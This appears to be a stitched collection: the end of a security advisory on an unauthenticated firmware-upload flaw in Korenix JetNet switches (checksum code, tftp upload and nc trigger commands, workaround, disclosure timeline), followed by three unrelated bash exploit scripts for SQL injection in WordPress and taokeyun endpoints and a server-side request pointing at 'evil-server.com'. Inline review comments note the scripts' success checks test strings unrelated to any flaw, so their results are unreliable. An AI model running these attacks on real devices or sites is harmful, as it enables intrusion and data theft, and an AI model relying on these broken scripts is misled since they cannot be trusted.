To test this<br />vulnerability we reimplemented the checksum calculation at offset 0x9bdc in<br />the binary "/bin/cmd-server2":<br /><br />===============================================================================<br />#include <stdio.h><br />#include <stdint.h><br />#include <stdlib.h><br /><br />int32_t check_file(const char* arg1) {<br /> FILE* r0 = fopen(arg1, "rb");<br /><br /> if (!r0) {<br /> return 0xffffffff;<br /> }<br /><br /> int32_t filechecksum = 0;<br /> int32_t last_data_size = 0;<br /> int32_t file_size = 0;<br /> uint8_t data_buf[4096];<br /> int32_t data_len = 1;<br /><br /> while (data_len > 0) {<br /> data_len = fread(data_buf, 1, sizeof(data_buf), r0);<br /><br /> if (data_len == 0) {<br /> break;<br /> }<br /><br /> int32_t counter = 0;<br /> while (counter < (data_len >> 2)) {<br /> int32_t byte_at_counter = *((int32_t*)(data_buf + (counter << 2)));<br /> counter++;<br /> filechecksum += byte_at_counter;<br /> }<br /><br /> file_size += data_len;<br /> last_data_size = data_len;<br /> }<br /><br /> fclose(r0);<br /><br /> if (last_data_size < 0x400 || (last_data_size >= 0x400 && (file_size - 0x14a<br /> 000) > 0x5ac000)) {<br /> return 0xffffffff;<br /> }<br /><br /> data_len = 0;<br /> while (data_len < (last_data_size >> 2)) {<br /> int32_t r3_2 = *((int32_t*)(data_buf + (data_len << 2)));<br /> data_len++;<br /> filechecksum -= r3_2;<br /> }<br /><br /> return filechecksum;<br />}<br /><br />int main(int argc, char* argv[]) {<br /> if (argc != 2) {<br /> printf("Usage: %s <file_path>\n", argv[0]);<br /> return 1;<br /> }<br /><br /> int32_t result = check_file(argv[1]);<br /> printf("0x%x\n", result);<br /><br /> return 0;<br />}<br />===============================================================================<br /><br />After modifying and repacking the squashfs, we calculated the checksum,<br />patched the required bytes in the metadata section (offset 0x11b-0x11e) and<br />initilized the update process.<br /><br 
/>===============================================================================<br /># tftp $IP<br />tftp> put exploit.bin /home/firmware.bin<br />Sent 5520766 bytes in 5.7 seconds<br /><br /># echo -e "\x00\x00\x00\x1f\x00\x00\x00\x01\x01" | nc -u $IP 5010<br />===============================================================================<br /><br />The output of the serial console can be observed below:<br />===============================================================================<br />Jan 1 00:01:00 Jan 1 00:01:00 syslog: UDP cmd is received<br />Jan 1 00:01:00 Jan 1 00:01:00 syslog: management vlan = sw0.0<br />Jan 1 00:01:00 Jan 1 00:01:00 syslog: setsockopt(SO_BINDTODEVICE) No such devi<br />Jan 1 00:01:00 Jan 1 00:01:00 syslog: tlv_count = 0<br />Jan 1 00:01:00 Jan 1 00:01:00 syslog: rec_bytes = 10<br />Jan 1 00:01:00 Jan 1 00:01:00 syslog: command TLV_FW_UPGRADE received<br />check firmware...<br />checksum=b2256313, inFileChecksum=b2256313<br />Firmware upgrading, don't turn off the switch!<br />Begin erasing flash:<br />.<br />Write firmware.bin (5480448 Bytes) to flash:<br />...<br />Write finished...<br />Terminating child processes...<br />Jan 1 00:01:01 Jan 1 00:01:01 syslog: first time create tlv_chain<br />Jan 1 00:01:01 syslogd exiting<br />Firmware upgrade success!!<br />waiting for reboot command .......<br />===============================================================================<br /><br />The vulnerabilities were manually verified on an emulated device by using the<br />MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).<br /><br /><br />Solution<br />-------------------------------------------------------------------------------<br />Beijer/Korenix provided a workaround to mitigate the vulnerabilities until a<br />proper patch is available (see "Workaround" section).<br /><br /><br />Workaround<br />-------------------------------------------------------------------------------<br />Beijer representatives 
provided the following workaround for mitigating the<br />vulnerabilities on devices of the JetNet series:<br />"Login by terminal:<br /><br />Switch# configure terminal<br /><br />Switch(config)# service ipscan disable<br /><br />Switch(config)# tftpd disable<br /><br />Switch(config)# copy running-config startup-config<br />"<br />Source: https://www.beijerelectronics.com/en/support/Help___online?docId=69947<br /><br />These commands should be used to deactivate the TFTP daemon on the device to<br />prevent unauthenticated actors from abusing the service.<br /><br />Recommendation<br />-------------------------------------------------------------------------------<br />Regardless of the current state of the vulnerability, CyberDanube recommends<br />customers from Korenix to upgrade the firmware to the latest version available.<br />Furthermore, a full security review by professionals is recommended.<br /><br /><br />Contact Timeline<br />-------------------------------------------------------------------------------<br />31-08-2023: Contacting Beijer Electronics Group via cs@beijerelectronics.com.<br />31-08-2023: Receiving contact information. Send vulnerability information.<br />26-09-2023: Asking about vulnerability status and receiving update release date.<br />27-10-2023: Received update from contact regarding the firmware update.<br />29-11-2023: Meeting with contact stating that it affects the whole series.<br />31-11-2023: Meeting to discuss potential solutions.<br />11-12-2023: Release delayed due to lack of workaround from manufacturer.<br />21-12-2023: Manufacturer provides workaround. Release date confirmed.<br />09-01-2024: Coordinated release of security advisory.<br /><br />Web: https://www.cyberdanube.com<br />Twitter: https://twitter.com/cyberdanube<br />Mail: research at cyberdanube dot com<br /><br />EOF Sebastian Dietz / @2024<br /><br /></code></pre>
<pre><code>#!/bin/bash

# Probe script for the rsvpmaker-email.php endpoint: it fetches the page,
# greps an SQL fragment ("FROM ... WHERE ...") out of the response body, then
# POSTs variants of that fragment back and reports "Vulnerability confirmed"
# when the reply contains "Wordfence Security Error".
#
# NOTE(review): "Wordfence Security Error" reads like a message produced by the
# Wordfence WAF when it blocks a request, not a result from the application;
# if so, a match means the request was blocked and the script's "confirmed"
# output says nothing about whether an injection exists. Treat its verdict as
# unreliable. The page does not show what rsvpmaker-email.php does with the
# POST body, so the probe's premise is inferred, not demonstrated.

# Set the URL of the website running the vulnerable plugin
url="http://example.com/wp-content/plugins/rsvpmaker/rsvpmaker-email.php"

# Set the number of columns in the query
columns=5

# Unauthenticated GET; $query becomes whatever matched the regex (possibly empty).
response=$(curl -s "$url")
query=$(echo "$response" | grep -oP 'FROM .* WHERE .*')

payload="' UNION SELECT 1,2,3,4,5-- "

# Test the query with different numbers of columns
for i in $(seq 1 $columns)
do
  # Bash expansions used here:
  #   ${query%?*}   - $query without its last character (shortest suffix matching "?*")
  #   ${payload:0:i} - the first i characters of $payload
  #   ${query#*?}   - $query without its first character (shortest prefix matching "*?")
  # The three are joined with a literal "?" and sent as the raw POST body.
  query_with_payload="${query%?*}?${payload:0:i}${query#*?}"
  curl -s -X POST -d "$query_with_payload" "$url" | grep -q "Wordfence Security Error"
  # $? is grep's status: 0 means the block/error string was present.
  if [ $? -eq 0 ]
  then
    echo "Vulnerability confirmed with $i columns"
    break
  fi
done
</code></pre>
<pre><code>#!/bin/bash

# Hand-built HTTP POST to the taokeyun Drs.php controller, written to port 80
# of example.com with nc. The body is an unencoded SQL string that selects an
# "email" column from a "users" table.
#
# Detection notes: the request line carries the absolute URL rather than a
# path, no Host header is added, the body is not URL-encoded, and the body
# contains a literal "UNION SELECT ... FROM users-- -"; any of these stands out
# in web server or WAF logs. The page does not show how Drs.php uses the
# parameter, so whether this string reaches a query is inferred, not shown.

# Variables
url="http://example.com/path/to/taokeyun/application/index/controller/m/Drs.php"
cid="1' UNION SELECT 1,2,3,4,5,6,7,8,9,email FROM users-- -"

# Construct the request
# Header lines are separated by literal "\r\n" sequences; echo -e below turns
# them into CR/LF bytes.
request="POST $url HTTP/1.1\r\n"
request+="Content-Type: application/x-www-form-urlencoded\r\n"
# Content-Length is computed as the length of $cid plus 15.
request+="Content-Length: $((${#cid}+15))\r\n\r\n"
# Body appended as-is (no parameter name, no encoding).
request+="$cid"

# Send the request
# The subshell's stdout is piped to nc; the response, if any, goes to the terminal.
(echo -e "$request") | nc example.com 80
</code></pre>
<pre><code>#!/bin/bash

# POSTs a "url=" parameter pointing at an attacker-controlled host to
# Api.php and prints "Exploit succeeded" when the response body contains the
# literal text "Exploit successful".
#
# NOTE(review): the parameter name suggests a server-side fetch of a supplied
# URL, but the page does not show what Api.php does with it. The success check
# keys on a string a real application would not normally return, so "Exploit
# succeeded" here is not evidence of anything on the target. The "Example
# payload and response" assignments at the bottom appear to be illustrative
# text: they run after the check and are never read, so they cannot affect
# the printed result.

# Set target URL and payload
target_url="http://example.com/application/pay/controller/Api.php"
payload="url=http://evil-server.com/exploit"

# Send the malicious request
# Single unauthenticated POST; only the response body is captured.
response=$(curl -s -X POST -d "$payload" "$target_url")

# Check if the exploit was successful
if echo "$response" | grep -q "Exploit successful"; then
  echo "Exploit succeeded"
else
  echo "Exploit failed"
fi

# Example payload and response
# Dead assignments: nothing below uses $payload or $response again.
payload="url=http://evil-server.com/exploit"
response="HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 01 Dec 2024 20:23:43 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 25
Connection: keep-alive

Exploit successful"
</code></pre>